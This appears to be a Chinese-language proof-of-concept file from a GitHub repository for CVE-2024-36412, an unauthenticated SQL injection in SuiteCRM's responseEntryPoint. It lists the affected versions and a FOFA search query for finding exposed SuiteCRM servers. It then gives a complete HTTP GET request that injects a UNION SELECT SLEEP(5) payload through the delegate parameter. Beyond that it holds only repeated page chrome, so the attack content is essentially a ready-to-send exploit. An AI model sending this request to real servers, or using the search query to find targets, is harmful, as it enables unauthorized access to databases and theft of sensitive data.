SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)

SuiteCRM存在SQL注入漏洞，未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句，从而获取数据库敏感信息。

影响范围:

SuiteCRM < 7.14.4
SuiteCRM < 8.6.1

fofa

title="SuiteCRM"

poc

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)

影响范围:

fofa

poc

Files

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md

Latest commit

History

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md

File metadata and controls

SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)

影响范围:

fofa

poc